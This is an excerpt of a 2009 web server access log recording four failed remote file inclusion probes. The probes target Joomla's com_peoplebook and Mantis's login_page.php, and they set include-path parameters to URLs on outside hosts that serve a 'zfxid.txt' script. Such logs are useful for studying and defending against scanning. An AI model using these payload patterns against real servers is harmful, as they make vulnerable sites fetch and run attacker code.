69.162.74.91 - - [06/Oct/2009:01:52:34 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:52:36 -0400] "GET /mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:52:36 -0400] "GET /logs/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:01:52:38 -0400] "GET /logs/access_log.Q109092200%20%20/mantis/login_page.php?g_meta_include_file=http://www.koreadefence.net/data/shirohige/zfxid.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
